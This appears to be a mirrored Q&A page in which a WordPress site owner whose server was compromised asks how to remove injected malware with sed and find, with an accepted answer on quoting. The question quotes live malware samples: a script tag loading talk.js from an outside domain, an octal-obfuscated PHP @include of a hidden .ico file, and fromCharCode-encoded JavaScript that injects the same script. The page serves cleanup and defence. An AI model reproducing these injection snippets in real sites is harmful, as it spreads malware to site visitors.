Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

How to replace whole string using sed or possibly grep

Tags:

grep

bash

shell

sed

So my whole server got hacked or got the malware problem. my site is based on WordPress and the majority of sites hosted on my server is WordPress based. The hacker added this line of code to every single file and in database

<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>

I did search it via grep using

grep -r "trasnaltemyrecords" /var/www/html/{*,.*}

I'm trying to replace it throughout the file structure with sed and I've written the following command.

sed -i 's/\<script type=\'text\/javascript\' src=\'https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547\'\>\<\/script\>//g' index.php

I'm trying to replace the string on a single file index.php first, so I know it works.

and I know my code is wrong. Please help me with this.

I tried with the @Eran's code and it deleted the whole line, which is good and as expected. However, the total jargon is this

/*ee8fa*/

@include "\057va\162/w\167w/\167eb\144ev\145lo\160er\141si\141/w\160-i\156cl\165de\163/j\163/c\157de\155ir\162or\057.9\06770\06637\070.i\143o";

/*ee8fa*/

And while I wish to delete all the content, I wish to keep the php opening tag <?php.

Though @slybloty's solution is easy and it worked.

so to remove the code fully from all the affected files. I'm running the following 3 commands, Thanks to all of you for this.

  1. find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g" - To Remove the script line
  2. find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i '/057va/d' - To remove the @include line
  3. find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i '/ee8fa/d' - To remove the comment line

Also, I ran all 3 commands again for '*.html', because the hacker's script created unwanted index.html in all the directories. I was not sure if deleting these index.html in bulk is the right approach.

now, I still need to figure out the junk files and traces of it.

The hacker script added the JS code as well.

var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}

Trying to see if I can sed it as well.

like image 267
Dilip Gupta Avatar asked Nov 07 '19 15:11

Dilip Gupta


People also ask

How do you replace a whole line using sed?

The sed command can be used to replace an entire line with a new line. The "c" command to sed tells it to change the line. The sed command can be used to convert the lower case letters to upper case letters by using the transform "y" option.

How do you grep and replace?

Another option would be to just use perl with globstar. Enabling shopt -s globstar in your . bashrc (or wherever) allows the ** glob pattern to match all sub-directories and files recursively. Thus using perl -pXe 's/SEARCH/REPLACE/g' -i ** will recursively replace SEARCH with REPLACE .

Can I use grep and sed together?

This collection of sed and grep use cases might help you better understand how these commands can be used in Linux. Tools like sed (stream editor) and grep (global regular expression print) are powerful ways to save time and make your work faster.


1 Answers

Use double quotes (") for the string and don't escape the single quotes (') nor the tags (<>). Only escape the slashes (/).

sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g" index.php
like image 176
slybloty Avatar answered Nov 09 '22 04:11

slybloty